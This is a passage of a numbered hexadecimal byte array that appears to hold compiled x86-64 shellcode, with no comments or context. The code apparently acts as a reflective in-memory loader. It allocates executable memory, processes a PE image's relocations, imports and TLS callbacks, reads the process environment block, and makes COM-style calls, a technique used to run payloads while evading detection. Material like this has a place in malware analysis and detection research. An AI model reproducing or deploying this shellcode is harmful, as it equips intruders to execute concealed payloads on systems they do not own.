420 0x75, 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x77,
421 0x01, 0x00, 0x00, 0x44, 0x39, 0x6b, 0x08, 0x0f, 0x84, 0x08, 0x01, 0x00,
422 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30, 0x05, 0x00, 0x00,
423 0x48, 0x03, 0xd7, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30,
424 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f,
425 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x48, 0x8b, 0xd3, 0x48,
426 0x8b, 0xc8, 0xe8, 0x61, 0x15, 0x00, 0x00, 0x8b, 0x43, 0x08, 0x8d, 0x48,
427 0xfd, 0x83, 0xf9, 0x02, 0x76, 0x21, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0xbe,
428 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8d,
429 0x8b, 0x28, 0x05, 0x00, 0x00, 0xe8, 0xbe, 0x12, 0x00, 0x00, 0xe9, 0xa3,
430 0x00, 0x00, 0x00, 0x0f, 0xb7, 0xc8, 0x4c, 0x8d, 0x84, 0x24, 0xd8, 0x01,
431 0x00, 0x00, 0x66, 0x41, 0x2b, 0xcd, 0x48, 0x8d, 0x94, 0x24, 0xd0, 0x01,
432 0x00, 0x00, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x66, 0x0b, 0xc8, 0xff, 0x96,
433 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xde, 0x00, 0x00, 0x00,
434 0x8b, 0x94, 0x24, 0xd0, 0x01, 0x00, 0x00, 0x44, 0x8d, 0x48, 0x04, 0x33,
435 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x44, 0x8b,
436 0x83, 0x20, 0x05, 0x00, 0x00, 0x4c, 0x8d, 0x8b, 0x28, 0x05, 0x00, 0x00,
437 0x0f, 0xb7, 0x4b, 0x08, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48,
438 0x8b, 0xf8, 0x66, 0x41, 0x2b, 0xcd, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x48,
439 0x89, 0x7c, 0x24, 0x30, 0x66, 0x0b, 0xc8, 0x48, 0x8d, 0x84, 0x24, 0xe0,
440 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24,
441 0x20, 0x44, 0x8b, 0x83, 0x24, 0x05, 0x00, 0x00, 0xff, 0x96, 0xa0, 0x01,
442 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b,
443 0xcf, 0x8b, 0xd8, 0x41, 0xff, 0xd7, 0x85, 0xdb, 0x75, 0x68, 0x48, 0x8b,
444 0xdd, 0x8b, 0x0b, 0x8d, 0x41, 0xfd, 0x41, 0x3b, 0xc5, 0x76, 0x50, 0x8d,
445 0x41, 0xff, 0x41, 0x3b, 0xc5, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b,
446 0xc5, 0x77, 0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x76, 0x09,
447 0x00, 0x00, 0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3,
448 0x48, 0x8b, 0xce, 0xe8, 0x3c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10,
449 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8,
450 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce,
451 0xe8, 0xbb, 0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
452 0xce, 0xe8, 0xae, 0x04, 0x00, 0x00, 0x8b, 0x86, 0xe4, 0x06, 0x00, 0x00,
453 0x83, 0xe8, 0x02, 0x41, 0x3b, 0xc5, 0x77, 0x34, 0x48, 0x8b, 0x8e, 0x20,
454 0x09, 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x28, 0x44, 0x8b, 0x86, 0x18,
455 0x09, 0x00, 0x00, 0x33, 0xd2, 0xe8, 0x22, 0x14, 0x00, 0x00, 0x48, 0x8b,
456 0x8e, 0x20, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00,
457 0x00, 0x41, 0xff, 0xd7, 0x48, 0x83, 0xa6, 0x20, 0x09, 0x00, 0x00, 0x00,
458 0x44, 0x8b, 0x06, 0x33, 0xd2, 0x8b, 0x9e, 0x30, 0x02, 0x00, 0x00, 0x48,
459 0x8b, 0xce, 0xe8, 0xf5, 0x13, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00,
460 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xce, 0x41, 0xff, 0xd7, 0x83, 0xfb, 0x02,
461 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff, 0xd6, 0x33, 0xc0, 0xe9, 0x72, 0xfc,
462 0xff, 0xff, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x55, 0x56, 0x57,
463 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac, 0x24,
464 0xe0, 0xfd, 0xff, 0xff, 0x48, 0x81, 0xec, 0x20, 0x03, 0x00, 0x00, 0x45,
465 0x33, 0xed, 0x33, 0xc0, 0x83, 0x3a, 0x02, 0x0f, 0x57, 0xc0, 0x4d, 0x8b,
466 0xf0, 0x4c, 0x89, 0x6c, 0x24, 0x50, 0x48, 0x8b, 0xf2, 0x48, 0x89, 0x45,
467 0x88, 0x45, 0x8d, 0x7d, 0x01, 0x66, 0x44, 0x89, 0xad, 0x68, 0x02, 0x00,
468 0x00, 0x48, 0x8b, 0xd9, 0x41, 0x8b, 0xfd, 0x0f, 0x11, 0x44, 0x24, 0x78,
469 0x0f, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x48, 0x28, 0x49, 0x8d,
470 0x50, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x80, 0x00, 0x00, 0x00, 0x85,
471 0xc0, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x48,
472 0x8d, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x90, 0x00, 0x00,
473 0x00, 0x85, 0xc0, 0x0f, 0x88, 0x91, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4c,
474 0x24, 0x50, 0x4c, 0x8d, 0x44, 0x24, 0x48, 0x41, 0x8b, 0xd7, 0xff, 0x93,
475 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x4c, 0x8d, 0x44,
476 0x24, 0x44, 0x41, 0x8b, 0xd7, 0xff, 0x93, 0xd0, 0x00, 0x00, 0x00, 0x8b,
477 0x44, 0x24, 0x44, 0x2b, 0x44, 0x24, 0x48, 0x41, 0x03, 0xc7, 0x0f, 0x84,
478 0x2e, 0x01, 0x00, 0x00, 0x41, 0x8d, 0x4d, 0x0c, 0x45, 0x8b, 0xc7, 0x33,
479 0xd2, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0x0c, 0x04,
480 0x00, 0x00, 0x33, 0xd2, 0x48, 0x8b, 0xf8, 0x45, 0x38, 0x28, 0x0f, 0x84,
481 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x41, 0xbf, 0x00, 0x01,
482 0x00, 0x00, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xc9, 0xff, 0x33,
483 0xc9, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54,
484 0x24, 0x40, 0x48, 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00,
485 0x44, 0x8b, 0x44, 0x24, 0x40, 0xb9, 0x08, 0x20, 0x00, 0x00, 0x66, 0x89,
486 0x4c, 0x24, 0x60, 0x33, 0xd2, 0x41, 0x8d, 0x4d, 0x08, 0x4c, 0x8b, 0xf8,
487 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xcd, 0x89, 0x8d, 0x78,
488 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x68, 0x44, 0x39, 0x6c, 0x24,
489 0x40, 0x0f, 0x86, 0x85, 0x00, 0x00, 0x00, 0x45, 0x8d, 0x65, 0x01, 0x49,
490 0x8b, 0x0c, 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
491 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
492 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00,
493 0x41, 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24,
494 0x40, 0x72, 0xcc, 0x45, 0x8b, 0xfc, 0xeb, 0x4e, 0xb9, 0x08, 0x20, 0x00,
495 0x00, 0x45, 0x8b, 0xc7, 0x66, 0x89, 0x4c, 0x24, 0x60, 0xb9, 0x08, 0x00,
496 0x00, 0x00, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x68,
497 0x02, 0x00, 0x00, 0x44, 0x89, 0xad, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
498 0x44, 0x24, 0x68, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
499 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
500 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xbf, 0x01, 0x00,
501 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x60, 0x44, 0x89, 0xad, 0x78, 0x02,
502 0x00, 0x00, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xcf,
503 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x4c, 0x8d,
504 0x4d, 0xd8, 0xf2, 0x0f, 0x10, 0x4d, 0x88, 0x48, 0x8d, 0x55, 0xa0, 0x66,
505 0x44, 0x89, 0x7c, 0x24, 0x78, 0x4c, 0x8b, 0xc7, 0x4c, 0x89, 0x6d, 0x80,
506 0x0f, 0x10, 0x44, 0x24, 0x78, 0x48, 0x8b, 0x01, 0xf2, 0x0f, 0x11, 0x4d,
507 0xb0, 0x0f, 0x29, 0x45, 0xa0, 0xff, 0x90, 0x28, 0x01, 0x00, 0x00, 0x48,
508 0x85, 0xff, 0x0f, 0x84, 0xee, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24,
509 0x68, 0xff, 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
510 0xc0, 0x00, 0x00, 0x00, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4d, 0x89, 0x6e,
511 0x38, 0xe9, 0xcc, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x0c, 0x02, 0x00,
512 0x00, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44,
513 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xcc, 0xff, 0x48, 0x89, 0x44, 0x24,
514 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48,
515 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44,
516 0x24, 0x58, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x8b, 0x01,
517 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c,
518 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45,
519 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x4d,
520 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8, 0x48, 0x85,
521 0xc0, 0x0f, 0x84, 0x44, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x28, 0x49,
522 0x8d, 0x46, 0x30, 0x4c, 0x8b, 0xc0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b,
523 0xd7, 0x4c, 0x8b, 0x09, 0x41, 0xff, 0x91, 0x88, 0x00, 0x00, 0x00, 0x44,
524 0x8b, 0xf0, 0x85, 0xc0, 0x0f, 0x88, 0x14, 0x01, 0x00, 0x00, 0x33, 0xff,
525 0x4c, 0x8d, 0x86, 0x0c, 0x04, 0x00, 0x00, 0x41, 0x38, 0x38, 0x0f, 0x84,
526 0xa6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24,
527 0x28, 0x45, 0x8b, 0xcc, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33,
528 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8d, 0x4d,
529 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x40,
530 0x8d, 0x4f, 0x0c, 0x33, 0xd2, 0x4c, 0x8b, 0xf8, 0xff, 0x93, 0xb0, 0x00,
531 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x64, 0x83, 0xa5,
532 0x78, 0x02, 0x00, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x40, 0x00, 0x76, 0x56,
533 0x33, 0xc9, 0x8d, 0x71, 0x08, 0x44, 0x8d, 0x61, 0x01, 0x49, 0x8b, 0x0c,
534 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0xc0, 0x66,
535 0x89, 0x75, 0xc0, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
536 0x45, 0xc8, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x44,
537 0x8b, 0xf0, 0x85, 0xc0, 0x79, 0x0b, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xc0,
538 0x00, 0x00, 0x00, 0x33, 0xff, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x41,
539 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24, 0x40,
540 0x72, 0xb3, 0x45, 0x85, 0xf6, 0x78, 0x52, 0x48, 0x8b, 0x4d, 0x90, 0x48,
541 0x8d, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x30, 0x0f, 0x57, 0xc0, 0x48,
542 0x8d, 0x55, 0xa0, 0x0f, 0x29, 0x45, 0xa0, 0xf2, 0x0f, 0x10, 0x45, 0x88,
543 0x45, 0x33, 0xc9, 0x48, 0x8b, 0x09, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00,
544 0x48, 0x89, 0x7c, 0x24, 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x49, 0x8b,
545 0xd5, 0xf2, 0x0f, 0x11, 0x45, 0xb0, 0x48, 0x8b, 0x01, 0xff, 0x90, 0xc8,
546 0x01, 0x00, 0x00, 0x48, 0x85, 0xff, 0x74, 0x09, 0x48, 0x8b, 0xcf, 0xff,
547 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x49, 0x8b,
548 0xcd, 0xff, 0x93, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
549 0xe0, 0x00, 0x00, 0x00, 0x41, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x41, 0x8b,
550 0xc7, 0x48, 0x8b, 0x9c, 0x24, 0x60, 0x03, 0x00, 0x00, 0x48, 0x81, 0xc4,
551 0x20, 0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
552 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x55, 0x56,
553 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec,
554 0x58, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0xaa, 0x28, 0x05, 0x00, 0x00, 0x48,
555 0x8b, 0xf1, 0x49, 0x63, 0x7d, 0x3c, 0x45, 0x33, 0xe4, 0x49, 0x03, 0xfd,
556 0x4c, 0x89, 0xa4, 0x24, 0xb8, 0x02, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x89,
557 0xbc, 0x24, 0xa0, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xfa, 0x4c, 0x89, 0x6c,
558 0x24, 0x30, 0xff, 0x56, 0x40, 0x48, 0x89, 0x84, 0x24, 0xb0, 0x02, 0x00,
559 0x00, 0x4c, 0x63, 0x40, 0x3c, 0x45, 0x0f, 0xb7, 0x4c, 0x00, 0x04, 0x66,
560 0x44, 0x39, 0x4f, 0x04, 0x0f, 0x85, 0x0b, 0x04, 0x00, 0x00, 0x8b, 0x57,
561 0x50, 0x45, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x33,
562 0xc9, 0x03, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xff, 0x56, 0x48,
563 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x03, 0x00, 0x00,
564 0x44, 0x8b, 0x47, 0x54, 0x49, 0x8b, 0xd5, 0x48, 0x8b, 0xc8, 0xe8, 0xe1,
565 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x6f, 0x14, 0x45, 0x8b, 0xf4, 0x48, 0x03,
566 0xef, 0x66, 0x44, 0x3b, 0x67, 0x06, 0x73, 0x2d, 0x41, 0x8b, 0xc6, 0x4c,
567 0x8d, 0x04, 0x80, 0x42, 0x8b, 0x54, 0xc5, 0x2c, 0x42, 0x8b, 0x4c, 0xc5,
568 0x24, 0x49, 0x03, 0xd5, 0x46, 0x8b, 0x44, 0xc5, 0x28, 0x48, 0x03, 0xcb,
569 0xe8, 0xaf, 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x47, 0x06, 0x41, 0xff, 0xc6,
570 0x44, 0x3b, 0xf0, 0x72, 0xd3, 0x8b, 0x87, 0xb0, 0x00, 0x00, 0x00, 0x85,
571 0xc0, 0x74, 0x76, 0x4c, 0x8b, 0xf3, 0x4c, 0x8d, 0x0c, 0x03, 0x4c, 0x2b,
572 0x77, 0x30, 0x45, 0x39, 0x21, 0x74, 0x66, 0xbd, 0x00, 0x10, 0x00, 0x00,
573 0x4d, 0x8d, 0x51, 0x08, 0xeb, 0x47, 0x41, 0x0f, 0xb7, 0x02, 0xb9, 0x00,
574 0xf0, 0x00, 0x00, 0x44, 0x0f, 0xb7, 0xd8, 0x66, 0x23, 0xc1, 0xb9, 0x00,
575 0xa0, 0x00, 0x00, 0x66, 0x3b, 0xc1, 0x75, 0x1f, 0x45, 0x8b, 0x01, 0x41,
576 0x81, 0xe3, 0xff, 0x0f, 0x00, 0x00, 0x4b, 0x8d, 0x04, 0x03, 0x48, 0x8b,
577 0x14, 0x18, 0x4b, 0x8d, 0x04, 0x03, 0x49, 0x03, 0xd6, 0x48, 0x89, 0x14,
578 0x18, 0xeb, 0x0a, 0x66, 0x44, 0x3b, 0xdd, 0x0f, 0x83, 0x22, 0x03, 0x00,
579 0x00, 0x49, 0x83, 0xc2, 0x02, 0x41, 0x8b, 0x41, 0x04, 0x49, 0x03, 0xc1,
580 0x4c, 0x3b, 0xd0, 0x75, 0xad, 0x4d, 0x8b, 0xca, 0x45, 0x39, 0x22, 0x75,
581 0x9f, 0x8b, 0x87, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x98,
582 0x00, 0x00, 0x00, 0x48, 0x8d, 0x2c, 0x03, 0x8b, 0x45, 0x0c, 0x85, 0xc0,
583 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x48, 0x03, 0xcb, 0xff,
584 0x56, 0x30, 0x44, 0x8b, 0x75, 0x00, 0x48, 0x8b, 0xf8, 0x44, 0x8b, 0x6d,
585 0x10, 0x4c, 0x03, 0xf3, 0x4c, 0x03, 0xeb, 0xeb, 0x4c, 0x79, 0x0b, 0x0f,
586 0xb7, 0xd1, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0xeb, 0x33, 0x41, 0x83,
587 0x7f, 0x04, 0x00, 0x4c, 0x8d, 0x24, 0x19, 0x74, 0x1a, 0x49, 0x8d, 0x54,
588 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xca, 0xf2, 0xff, 0xff, 0x85, 0xc0,
589 0x74, 0x09, 0x48, 0x8b, 0x86, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x49,
590 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0x45, 0x33,
591 0xe4, 0x49, 0x83, 0xc6, 0x08, 0x49, 0x89, 0x45, 0x00, 0x49, 0x83, 0xc5,
592 0x08, 0x49, 0x8b, 0x0e, 0x48, 0x85, 0xc9, 0x75, 0xac, 0x8b, 0x45, 0x20,
593 0x48, 0x83, 0xc5, 0x14, 0x85, 0xc0, 0x75, 0x86, 0x48, 0x8b, 0xbc, 0x24,
594 0xa0, 0x02, 0x00, 0x00, 0x4d, 0x8d, 0xaf, 0x28, 0x05, 0x00, 0x00, 0x8b,
595 0x87, 0xf0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x72, 0x4c, 0x8d, 0x73,
596 0x04, 0x4c, 0x03, 0xf0, 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x64, 0x8b,
597 0xc8, 0x48, 0x03, 0xcb, 0xff, 0x56, 0x30, 0x4c, 0x8b, 0xe0, 0x48, 0x85,
598 0xc0, 0x74, 0x3e, 0x45, 0x8b, 0x7e, 0x0c, 0x41, 0x8b, 0x6e, 0x08, 0x4c,
599 0x03, 0xfb, 0x48, 0x03, 0xeb, 0xeb, 0x26, 0x48, 0x8b, 0x46, 0x38, 0x48,
600 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xd1, 0xeb, 0x07, 0x48, 0x8d, 0x53,
601 0x02, 0x48, 0x03, 0xd1, 0x49, 0x8b, 0xcc, 0xff, 0xd0, 0x49, 0x83, 0xc7,
602 0x08, 0x48, 0x89, 0x45, 0x00, 0x48, 0x83, 0xc5, 0x08, 0x49, 0x8b, 0x0f,
603 0x48, 0x85, 0xc9, 0x75, 0xd2, 0x49, 0x83, 0xc6, 0x20, 0x45, 0x33, 0xe4,
604 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x75, 0xa4, 0x4c, 0x8b, 0xbc, 0x24, 0xa8,
605 0x02, 0x00, 0x00, 0x8b, 0x87, 0xd0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74,
606 0x24, 0x4c, 0x8b, 0x74, 0x18, 0x18, 0x4d, 0x85, 0xf6, 0x74, 0x1a, 0xeb,
607 0x10, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xcb, 0x41, 0x8d, 0x50, 0x01, 0xff,
608 0xd0, 0x4d, 0x8d, 0x76, 0x08, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x75,
609 0xe8, 0x8b, 0x6f, 0x28, 0x48, 0x03, 0xeb, 0x41, 0x83, 0x3f, 0x03, 0x0f,
610 0x85, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8c, 0x24, 0xb0, 0x02, 0x00,
611 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8d, 0x50, 0x01, 0xff, 0xd5, 0x49, 0x8d,
612 0x97, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x94, 0x24, 0xa0, 0x02, 0x00,
613 0x00, 0x44, 0x38, 0x22, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0x8b, 0x87,
614 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x73, 0x01, 0x00, 0x00,
615 0x48, 0x03, 0xc3, 0x8b, 0x68, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x65, 0x01,
616 0x00, 0x00, 0x44, 0x8b, 0x70, 0x1c, 0x44, 0x8b, 0x60, 0x20, 0x4c, 0x03,
617 0xf3, 0x44, 0x8b, 0x78, 0x24, 0x4c, 0x03, 0xe3, 0x4c, 0x03, 0xfb, 0xff,
618 0xcd, 0x41, 0x8b, 0x0c, 0xac, 0x48, 0x03, 0xcb, 0xe8, 0x97, 0x0c, 0x00,
619 0x00, 0x85, 0xc0, 0x74, 0x0e, 0x85, 0xed, 0x74, 0x18, 0x48, 0x8b, 0x94,
620 0x24, 0xa0, 0x02, 0x00, 0x00, 0xeb, 0xe0, 0x41, 0x0f, 0xb7, 0x04, 0x6f,
621 0x45, 0x8b, 0x34, 0x86, 0x4c, 0x03, 0xf3, 0xeb, 0x08, 0x4c, 0x8b, 0xb4,
622 0x24, 0xb8, 0x02, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48,
623 0x8b, 0xcb, 0xe8, 0x45, 0x0c, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33,
624 0xd2, 0x48, 0x8b, 0x4c, 0x24, 0x30, 0xe8, 0x35, 0x0c, 0x00, 0x00, 0x4d,
625 0x85, 0xf6, 0x0f, 0x84, 0xf3, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xac, 0x24,
626 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80,
627 0x3f, 0x00, 0x74, 0x43, 0x8b, 0x85, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
628 0x74, 0x26, 0x48, 0x8d, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x00,
629 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20,
630 0x4c, 0x8b, 0xc7, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x8b, 0x85,
631 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x48,
632 0x0f, 0x44, 0xcf, 0x41, 0xff, 0xd6, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0x41,
633 0xff, 0xd6, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x4d, 0x8d, 0x87, 0x0c, 0x04,
634 0x00, 0x00, 0x45, 0x38, 0x20, 0x74, 0x2a, 0x48, 0x8d, 0x44, 0x24, 0x40,
635 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff,
636 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70,
637 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce, 0xe8, 0x7f, 0x03, 0x00,
638 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xe8, 0x89,
639 0x0b, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x49, 0x8b, 0xcd,
640 0xe8, 0x7b, 0x0b, 0x00, 0x00, 0x45, 0x39, 0x67, 0x04, 0x74, 0x2d, 0x4c,
641 0x89, 0x64, 0x24, 0x28, 0x45, 0x33, 0xc9, 0x4c, 0x8b, 0xc5, 0x44, 0x89,
642 0x64, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x88, 0x00, 0x00,
643 0x00, 0x48, 0x85, 0xc0, 0x74, 0x1d, 0x83, 0xca, 0xff, 0x48, 0x8b, 0xc8,
644 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xeb, 0x0f, 0x65, 0x48, 0x8b, 0x0c,
645 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x60, 0xff, 0xd5, 0x33,
646 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xff, 0x56,
